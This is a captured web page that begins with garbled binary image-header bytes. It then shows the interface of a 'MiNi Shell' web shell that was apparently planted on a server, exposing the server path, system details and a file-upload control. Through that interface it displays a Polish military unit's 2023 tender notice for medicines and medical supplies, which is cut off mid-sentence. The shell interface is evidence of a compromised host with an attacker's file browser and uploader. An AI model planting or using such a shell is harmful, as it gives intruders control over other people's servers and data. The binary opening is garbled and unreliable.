JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230210/0009043301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> ZAKUP I DOSTAWY LEKÓW I MATERIAŁÓW MEDYCZNYCH W 2023 ROKU. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">21 Wojskowy Oddział Gospodarczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 281385396</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kwiatkowskiego 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Elbląg</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">21wog@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://21wog.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> 21 Wojskowy Oddział Gospodarczy </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZAKUP I DOSTAWY LEKÓW I MATERIAŁÓW MEDYCZNYCH W 2023 ROKU. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-57769526-a300-11ed-b8d9-2a18c1f2976f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00090433</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/21wog <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/21wog</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>wysyłania i odbierania dokumentów elektronicznych i informacji przekazywanych przy ich użyciu zostały opisane<br/>w Regulaminie korzystania z usług Systemu (Regulamin Portalu e-Usług) dostępnym<br/>z poziomu modułu E-learning dla wszystkich użytkowników Systemu oraz podczas rejestracji konta Wykonawcy dla Wykonawców.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) <br/>(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	Administratorem Pani/Pana danych osobowych jest 21 Wojskowy Oddział Gospodarczy w Elblągu, ul. Kwiatkowskiego 15, 82-300 Elbląg, e-mail: 21wog@ron.mil.pl;<br/>	Administrator wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować w sprawach związanych z danymi osobowymi pod adresem e-mail: 21wog@ron.mil.pl;<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO <br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego na: „Zakup i dostawy leków i materiałów medycznych w 2023 roku.”, nr postępowania: 3/SZP/2023;<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania. <br/>	Pani/Pana dane osobowe będą przechowywane przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 5 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest <br/>art. 6 ust. 1 lit. c RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">j.w.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">21WOG-SZP.2712.3.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zakup i dostawy leków, maści, żeli, kropli i innych w 2023 roku wraz z transportem i rozładunkiem do magazynu Zamawiającego wskazanego w ust. 4 dla 21. Wojskowego Oddziału Gospodarczego w Elblągu oraz jednostek i instytucji wojskowych będących na jego zaopatrzeniu. <br/>2. Część zamówienia nr 1 – Leki , maście, żele, krople i inne, zgodnie z:<br/>a.	Rozporządzeniem Ministra Zdrowia z dnia 12 stycznia 2011 r. w sprawie wykazu produktów leczniczych, które mogą być doraźnie dostarczane<br/>w związku z udzielanym świadczeniem zdrowotnym oraz wykazu produktów leczniczych wchodzących w skład zestawów przeciwwstrząsowych, ratujących życie (Dz. U. 2011 nr 18 poz. 94),<br/>b.	Rozporządzeniem Ministra Zdrowia z dnia 16 grudnia 2019 r. w sprawie medycznych czynności ratunkowych i świadczeń zdrowotnych innych niż medyczne czynności ratunkowe, które mogą być udzielane przez ratownika medycznego (Dz. U. 2019 poz. 2478),<br/>c.	Ustawą z dnia 9 października 2015 r. o produktach biobójczych (Dz. U. 2015 poz. 1926),<br/>d.	Rozporządzeniem Ministra Zdrowia z dnia 28 lutego 2017 r. w sprawie rodzaju i zakresu świadczeń zapobiegawczych, diagnostycznych, leczniczych i rehabilitacyjnych przez pielęgniarkę albo położną samodzielnie bez zlecenia lekarza (Dz. U. 2017 poz. 497),<br/>e.	Rozporządzenie Ministra Zdrowia z dnia 20 lutego 2009 r. w sprawie wymagań dotyczących oznakowania opakowań produktu leczniczego i treści ulotki (Dz. U. 2009 nr 39 poz. 321),<br/>f.	Rozporządzeniem Ministra Obrony Narodowej z dnia 22 września 2022 r. w sprawie wykazu produktów leczniczych oznaczonych symbolem OTC oraz wyrobów medycznych, wyposażenia wyrobów medycznych, systemów i zestawów zabiegowych wydanych bezpłatnie (Dz. U. 2022 poz. 2099).<br/>3.	Szczegółowe zestawienie asortymentu wchodzącego w skład przedmiotu zamówienia stanowi załączniki nr 1a do Opisu Przedmiotu Zamówienia (OPZ) (113 pozycje asortymentowe). <br/>4.	Wykonawca zobowiązany jest do dostarczania i rozładowania przedmiotu zamówienia na własny koszt i ryzyko do magazynu Sekcji Medycznej 21.Wojskowego Oddziału Gospodarczego przy ul. Kwiatkowskiego 15 w Elblągu w godzinach od 8:00 do 13:00 (w piątki 8.00 – 11.00), według każdorazowego pisemnego zamówienia przesłanego Wykonawcy.<br/>5. Przedmiot zamówienia będzie realizowany z wykorzystaniem prawa opcji. Opcja polega na powtórzeniu tego samego asortymentu dla ilości maksymalnych określonych w załączniku nr 1a do Opisu Przedmiotu Zamówienia i w załączniku nr 2a do SWZ. <br/>Jeżeli dla pozycji asortymentowej ilość minimalna i maksymalna stanowią taką samą wielkość oznacza to, że dla danej pozycji asortymentowej Zamawiający nie stosuje prawa opcji.<br/>6. Zamawiający wymaga by Wykonawca dostawy dla ilości minimalnych realizował według szczegółowych zamówień, przesyłanych przez Zamawiającego określającego ilość, asortyment i jednostkę wojskową której dotyczy zamawiany przedmiot zamówienia w terminie zaoferowanym przez Wykonawcę w formularzu ofertowym (termin realizacji dostawy dla ilości minimalnych od dnia złożenia zamówienia przez Zamawiającego). <br/>7.	Zamawiający wymaga by Wykonawca dostawy dla ilości maksymalnych (o ile będą realizowane) realizował według szczegółowych zamówień, przesyłanych przez Zamawiającego określającego ilość, asortyment i jednostkę wojskową której dotyczy zamawiany przedmiot zamówienia w terminie do 14 dni roboczych od przesłania przez Zamawiającego zamówienia. Za dzień roboczy przyjmuje się dni od poniedziałku do piątku.<br/>8.	Asortyment powinien być czytelnie oznakowany (nazwa, postać, kod) i opisany w języku polskim (ulotka w języku polskim). Na opakowaniach powinna znajdować się czytelna seria i data ważności.<br/>9.	Okres ważności asortymentu (oznaczenie daty przydatności na każdym opakowaniu), powinien być jak najdłuższy, jednakże:<br/>a)	w przypadku produktów leczniczych oznaczonych symbolem OTC - nie krótszy niż 12 miesięcy od daty dostawy;<br/>b)	w pozostałych przypadkach - nie krótszy niż 24 miesiące od daty dostawy.<br/>10.	Zamawiający zastrzega sobie możliwość zmiany w ilościach poszczególnego asortymentu <br/>objętego przedmiotem umowy, w zależności od faktycznych potrzeb jednostek i instytucji wojskowych znajdujących się na zaopatrzeniu 21. Wojskowego Oddziału Gospodarczego w Elblągu. Zmiany mogą polegać na zwiększeniu lub zmniejszeniu ilości jednego asortymentu kosztem zmniejszenia lub zwiększenie innego asortymentu objętego przedmiotem umowy.<br/> Powyższe zmiany nie mogą przekroczyć 10% ilości poszczególnych asortymentów oraz nie mogą doprowadzić do zwiększenia wartości umowy, o której mowa w §2 projektowanych postanowień umowy (załącznik nr 4 do SWZ).<br/>11.	W ramach przedmiotu zamówienia Wykonawca zobowiązany jest do:<br/>a)	dostarczania asortymentu zgodnie ze złożoną ofertą, spełniającego warunki dopuszczenia do obrotu i do używania na terytorium Rzeczypospolitej Polskiej oraz wszystkie europejskie i polskie wymagania i normy medyczne oraz zapewnia że przedmiot zamówienia jest wolny od jakichkolwiek wad;<br/>b)	okazania, na każde żądanie Zamawiającego, odpowiedniego certyfikatu zgodności z polską normą lub normami europejskimi, wpisu do Rejestru Produktów Leczniczych Dopuszczonych do Obrotu na terytorium Rzeczypospolitej Polskiej, certyfikatu CE, deklaracji zgodności itp.,<br/>c)	zapewnienia terminowej realizacji dostaw,<br/>d)	dostarczania asortymentu transportem spełniającym warunki określone<br/>w wymaganiach producenta w zakresie przechowywania i transportu danego asortymentu,<br/>e)	dostarczania asortymentu na własny koszt i ryzyko do magazynu 21.Wojskowego Oddziału Gospodarczego w Elblągu,<br/>f)	dokonania weryfikacji zabezpieczeń i wycofania niepowtarzalnego identyfikatora (kod 2D Data Matrix) preparatu leczniczego przed dostawą. <br/>Szczegółowy opis części zamówienia zawiera zał. nr 1, 2a i 4 do SWZ.<br/><br/>Zamówienie będzie realizowane z wykorzystaniem prawa opcji. Opcja polega na powtórzeniu tego samego asortymentu dla ilości maksymalnych określonych w SWZ. Zamawiający informuje, że jeśli ilość minimalna jest równa ilości maksymalnej oznacza to, że dla danej pozycji asortymentowej nie stosuje się prawa opcji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33600000-6 - Produkty farmaceutyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Umowa przewiduje wykorzystanie przez Zamawiającego prawa opcji. Opcja polega na powtórzeniu tego samego asortymentu dla ilości maksymalnych określonych w SWZ <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>1) Cena brutto oferty dla ilości minimalnych- 60%<br/>2) Termin realizacji dostaw dla ilości minimalnych - 40%<br/>2. Liczba punktów uzyskanych przez daną ofertę będzie wyliczona według wzoru:<br/>P = K1 + K2 <br/>K1 – liczba punktów uzyskana przez daną ofertę w kryterium „Cena brutto oferty dla ilości minimalnych”<br/>K2 – liczba punktów uzyskana przez daną ofertę w kryterium „Termin realizacji dostaw dla ilości minimalnych”<br/><br/>3. W kryterium „Cena brutto oferty dla ilości minimalnych” zostanie zastosowany wzór:<br/> najniższa oferowana cena brutto dla ilości minimalnych <br/>Liczba punktów = --------------------------------------------------------- x 100 pkt x 60%<br/> cena brutto dla ilości minimalnych oferty badanej<br/><br/>4. W kryterium „ Termin realizacji dostaw dla ilości minimalnych” zostanie zastosowany sposób oceny ofert:<br/>Dla części zamówienia nr 1 i 2- Termin realizacji dostaw dla ilości minimalnych od dnia złożenia zamówienia przez Zamawiającego- Liczba punktów:<br/>- do 2 dni roboczych od dnia złożenia zamówienia przez Zamawiającego -40 pkt;<br/>- od 3 do 4 dni roboczych od dnia złożenia zamówienia przez Zamawiającego- 30 pkt;<br/>- od 5 do 6 dni roboczych od dnia złożenia zamówienia przez Zamawiającego- 20 pkt;<br/>- od 7 do 8 dni roboczych od dnia złożenia zamówienia przez Zamawiającego- 10 pkt;<br/>- od 9 do 10 dni roboczych od dnia złożenia zamówienia przez Zamawiającego- 0 pkt.<br/><br/>Wykonawca otrzyma:<br/>40 pkt – jeżeli termin realizacji dostaw dla ilości minimalnych od dnia złożenia zamówienia przez Zamawiającego wyniesie do 2 dni roboczych;<br/>30 pkt – jeżeli termin realizacji dostaw dla ilości minimalnych od dnia złożenia zamówienia przez Zamawiającego wyniesie od 3 do 4 dni roboczych;<br/>20 pkt – jeżeli termin realizacji dostaw dla ilości minimalnych od dnia złożenia zamówienia przez Zamawiającego wyniesie od 5 do 6 dni roboczych;<br/>10 pkt – jeżeli termin realizacji dostaw dla ilości minimalnych od dnia złożenia zamówienia przez Zamawiającego wyniesie od 7 do 8 dni roboczych;<br/>0 pkt – jeżeli termin realizacji dostaw dla ilości minimalnych od dnia złożenia zamówienia przez Zamawiającego wyniesie od 9 do 10 dni roboczych.<br/><br/>UWAGA:<br/>- Maksymalny termin realizacji dostaw dla ilości minimalnych od dnia złożenia zamówienia przez Zamawiającego wynosi do 10 dni roboczych. <br/>- W przypadku zaoferowania przez Wykonawcę terminu realizacji dostaw dla ilości minimalnych od dnia złożenia zamówienia przez Zamawiającego dłuższego niż 10 dni roboczych spowoduje odrzucenie oferty jako niezgodnej z treścią SWZ.<br/>- W przypadku braku zaznaczenia w formularzu ofertowym rubryki Zamawiający przyjmie, że zaoferowano termin realizacji dostaw dla ilości minimalnych od dnia złożenia zamówienia przez Zamawiającego od 9 do 10 dni roboczych, co będzie oznaczać uzyskanie 0 pkt w kryterium „Termin realizacji dostaw dla ilości minimalnych”.<br/>- Zaznaczenie więcej niż jednej rubryki w formularzu ofertowym (załącznik nr 2 do SWZ) spowoduje odrzucenie oferty.<br/>- Za dzień roboczy Zamawiający przyjmuje dni od poniedziałku do piątku.<br/>- Dostawy do magazynu Zamawiającego w godz.:<br/>- poniedziałek – czwartek 8:00-13:00, <br/>- w piątek 8:00-11:00.<br/><br/>5.	Oferta będzie podlegać ocenie dla każdej części zamówienia. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>6. Za ofertę najkorzystniejszą zostanie uznana ta oferta spośród złożonych, która uzyska najwyższą liczbę punktów. Maksymalna liczba punktów, jaką może osiągnąć oferta wynosi 100.<br/>7. Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostaw dla ilości minimalnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zakup i dostawy materiałów medycznych, komponentów Indywidualnych Pakietów Medycznych w 2023 roku z z transportem i rozładunkiem do magazynu Zamawiającego wskazanego w ust. 4 dla 21. Wojskowego Oddziału Gospodarczego w Elblągu oraz jednostek i instytucji wojskowych będących na jego zaopatrzeniu. <br/>2.	Część zamówienia nr 2 – Materiały medyczne, komponenty Indywidualnych Pakietów Medycznych, zgodnie z:<br/>a.	Ustawą z dnia 7 kwietnia 2022 r. o wyrobach medycznych (Dz. U. 2022 r.<br/>poz. 974),<br/>b.	Rozporządzeniem Ministra Zdrowia z dnia 12 stycznia 2011 r. w sprawie wykazu produktów leczniczych, które mogą być doraźnie dostarczane<br/>w związku z udzielanym świadczeniem oraz wykazu produktów leczniczych wchodzących w skład zestawów przeciwwstrząsowych, ratujących życie (Dz. U. 2011 nr 18 poz. 94),<br/>c.	Rozporządzeniem Ministra Zdrowia z dnia 16 grudnia 2019 r. r. w sprawie medycznych czynności ratunkowych i świadczeń zdrowotnych innych<br/>niż medyczne czynności ratunkowe, które mogą być udzielane przez ratownika medycznego (Dz. U. 2019 poz. 2478),<br/>d.	Rozporządzeniem Ministra Zdrowia z dnia 28 lutego 2017 r. w sprawie rodzaju i zakresu świadczeń zapobiegawczych, diagnostycznych, leczniczych i rehabilitacyjnych udzielanych przez pielęgniarkę albo położną samodzielnie bez zlecenia lekarza (Dz. U. 2017 poz. 497),<br/>e.	Wymaganiami Eksploatacyjno-Technicznymi dla Plecaka Ratownika- Sanitariusza (PRS), stanowiącego załącznik nr 1a do Opisu Przedmiotu Zamówienia (OPZ), <br/>f.	Wymaganiami Eksploatacyjno-Technicznymi dla Plecaka Ratownika-Medycznego (PRM), stanowiącego załącznik nr 1b do Opisu Przedmiotu Zamówienia (OPZ),<br/>g.	Wymaganiami Eksploatacyjno-Technicznymi dla Indywidualnego Pakietu Medycznego (IPMED), stanowiącego załącznik nr 1c do Opisu Przedmiotu Zamówienia (OPZ),<br/>h.	Wymaganiami Eksploatacyjno-Technicznymi dla Torby Lekarza (TL), stanowiącego załącznik nr 1d do Opisu Przedmiotu Zamówienia (OPZ) .<br/>i.	Rozporządzeniem Ministra Obrony Narodowej z dnia 22 września 2022 r. w sprawie wykazu produktów leczniczych oznaczonych symbolem OTC oraz wyrobów medycznych, wyposażenia 